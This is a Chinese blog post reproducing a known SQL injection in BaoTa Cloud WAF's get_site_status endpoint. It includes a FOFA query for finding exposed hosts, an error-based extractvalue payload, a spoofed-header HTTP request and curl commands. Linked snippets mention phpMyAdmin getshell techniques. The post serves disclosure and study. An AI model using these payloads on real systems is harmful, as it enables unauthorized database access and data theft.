【漏洞复现】宝塔WAF-get_site_status-SQL注入漏洞

已于 2024-03-19 13:00:51 修改
阅读量844 收藏 12
点赞数 7
分类专栏: 漏洞复现 文章标签: 网络安全
于 2024-03-15 20:45:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80733390/article/details/136745056
版权

免责声明

文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

堡塔云 WAF 是广东堡塔安全技术有限公司的一款 WAF 产品。

堡塔云 WAF get_site_status 接口 server_name 参数存在 SQL注入漏洞,攻击者可利用此漏洞获取数据库敏感信息。

影响范围

堡塔云 WAF

资产测绘

FOFA:

title==“404 - Website not exist!”
“宝塔”

漏洞复现

SQL注入漏洞存在于 server_name参数处
URL地址改为:

/get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-'

修改HOST,并新增X-Forwoarded-For改为:127.0.0.251
X-Forwarded-For: 127.0.0.1

GET /get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-' HTTP/2
Host: 127.0.0.251
X-Forwarded-For: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

image
image
image

或者使用:

curl "http://目标地址/get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-'"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

curl "http://目标地址/get_site_status?server_name='-extractvalue(1,concat(0x5c,version()))-'"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

修复建议

1、关注宝塔官方补丁
https://www.bt.cn/

参考文档:
https://developer.aliyun.com/article/1440038

Nday_Seeker
关注
专栏目录
skydeep-waf-trial_waf_
10-01
强大的waf软件
宝塔最新未授权访问漏洞sql注入
m0_52514790的博客
02-23 1544
整个宝塔 WAF 核心防护功能的代码写的确实有点粗糙,代码组织方式不像一个成熟软件该有的架构,小 Bug 一眼望不到头,今天分享的是一个未授权访问漏洞,普通用户可以无视宝塔的随机登录地址,无视宝塔的登录密码,直接操作后台的数据,实现人人都是管理员的效果。这段代码位于 /cloud_waf/nginx/conf.d/waf/public/waf_route.lua 文件中,源文件是 luajit 编译后的内容,反编译一下即可看到源码。话说这是临时工写的代码吧,对于宝塔的配置来说,要满足这两个条件很难吗?
浅谈宝塔渗透手法,从常见漏洞 聊到 宝塔维权 再到 bypass disable_functions原理
milu_Sec的博客
12-31 4882
公网无需鉴权直接 root 权限进入 phpmyadmin,IP或域名地址:888/pma为什么要介绍这个洞呢,因为phpmyadmin这里好做文章,常见手法有into outfile写shell,日志get shell,UDF getshell,MOF提权,网上教程一大堆,这里麋鹿就不浪费大家时间了,不熟悉的读者可以百度一下。
秘密-宝塔漏洞复现-详细网安教程
最新发布
2401_84915584的博客
07-10 488
扫码领资料获网安教程本文由掌控安全学院 -caih投稿前几天找到个可以上传任意文件的上传点,成功上传phpinfo页面并能访问,但是不能成功上传一句话
宝塔严重未知安全性漏洞宝塔面板或Nginx异常)
Jan's的博客
12-09 5234
5、【企业版防篡改-重构版】插件可以有效防止网站被篡改,建议开启并设置root用户禁止修改文件(需要使用时再放开),另外,将。同时文件大小不一致的话,是因为安装方式的不同,极速安装包的安装大小一般都为5M,编译方式安装的大小大约为。)锁住,此目录在正常使用中不会有任何修改的行为,除了重装以外其他修改行为均可视为被篡改,所以将它锁上。另外,未出现异常问题正常使用的用户,我们给出加固建议,如果您担心面板存在风险,可以登录终端执行。1、升级面板到最新版,已经是最新版的,在首页修复面板,并开启。
宝塔 phpmyadmin未授权访问漏洞
初岄的博客
07-26 2300
宝塔 phpmyadmin未授权访问漏洞
宝塔漏洞复现
黑白的博客
09-06 1万+
声明 好好学习,天天向上 漏洞描述 宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能 该漏洞是phpmyadmin未鉴权,可通过特定地址直接登录数据库的漏洞 影响范围 宝塔Linux面板7.4.2版本 宝塔Linux测试版7.5.13 Windows面板6.8版本 复现过程 漏洞镜像可以用docker获取 先配置加速器(公
宝塔7.4.2漏洞复现
震山的博客
08-20 1820
复现宝塔当时广为流传的 pma 非授权访问漏洞
waf-fle_0.6.4.tar.gz
12-11
waf-fle_0.6.4.tar.gz” 是一个软件的压缩包文件,其中“waf-fle”可能是该软件的缩写,代表“Web Application Firewall - Flexible Logging and Event Management”的意思,暗示这是一款与Web应用防火墙(WAF)...
CmsEasy crossall_act.php SQL注入漏洞.md
04-08
### SQL注入漏洞知识点 1. **SQL注入概念** SQL注入(SQL Injection)是一种攻击技术,攻击者通过在Web表单输入或通过修改URL查询字符串来插入恶意的SQL代码,一旦网站应用未进行适当的输入验证或对用户输入的代码...
SQL.rar_sql injection_sql 注入_sql注入
09-14
在"SQL.rar"中,我们看到与SQL注入相关的资源,包括一个名为"SQL.cpp"的C++源代码文件,这可能是用于模拟或测试SQL注入漏洞的程序。 SQL注入攻击的基本原理是利用用户输入的数据直接拼接到SQL查询中,如果输入未经...
identYwaf-master_网站waf测工具
03-27
WAF 是一种专门针对Web应用程序的安全防护系统,它可以监控、过滤或者阻止恶意流量,保护网站免受SQL注入、跨站脚本攻击(XSS)、缓冲区溢出、恶意扫描等网络攻击。WAF通常部署在Web服务器和Internet之间,通过检查...
SQL.rar_sql注入_网络安全_网络安全 试题
09-20
"SQL注入.doc"可能会涵盖这些防御策略的详细实施步骤,以及如何通过实际例子识别和修复SQL注入漏洞。而"www.pudn.com.txt"可能提供了额外的资料链接,如教程、工具或讨论论坛,帮助深入学习和实践。 总之,理解和...
ngx_lua_waf-master.zip_lua_nearly11h_nginx_ngx_lua_waf
09-21
WAF(Web Application Firewall)是专门针对Web应用的安全防护工具,它可以检测并阻止SQL注入、跨站脚本攻击(XSS)、命令注入等常见的Web攻击。ngx_lua_waf使用Lua编写,可以实现动态规则检查、请求参数过滤、IP...
php中sql注入漏洞示例 sql注入漏洞修复
10-26
首先,我们来看SQL注入漏洞是如何形成的。SQL注入是指通过在应用程序中执行恶意SQL代码来控制数据库服务器的一种攻击方式。攻击者可以利用漏洞将特殊构造的SQL语句注入到应用程序中,导致数据库中的数据被非法读取、...
通达OA sql注入漏洞.zip
08-24
然而,就像许多其他复杂的软件系统一样,它可能存在安全漏洞,其中之一就是SQL注入漏洞SQL注入网络安全中的一个常见问题,允许攻击者通过在输入字段中插入恶意SQL代码来操纵数据库,获取敏感信息,甚至完全控制...
宝塔面板】紧急安全更新通知
热门推荐
滴水石穿
08-24 1万+
今早起床就发现了宝塔发的信息:建议大家看自己的宝塔需不需要更新! 【宝塔面板】紧急安全更新通知,Linux面板7.4.2版本/Windows面板6.8版本存在安全隐患,其他版本无此风险。已发布紧急更新,请所有使用此版本的用户务必升级到最新版,更新方法,登录面板直接升级更新即可,如更新出现问题,请登录宝塔论坛反馈或者联系客服反馈。 之后找到了如下的内容 ====================================== 周日晚,某群里突然发布了一则消息,宝塔面板的phpmyadmin存在未授
宝塔漏洞生成原因
震山的博客
08-20 1133
分析造成这个问题的背后思路
宝塔WAF-get_site_status-SQL注入漏洞(含批量验证poc)_堡塔云waf存在sql注入(1)
2301_77118221的博客
04-16 444
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值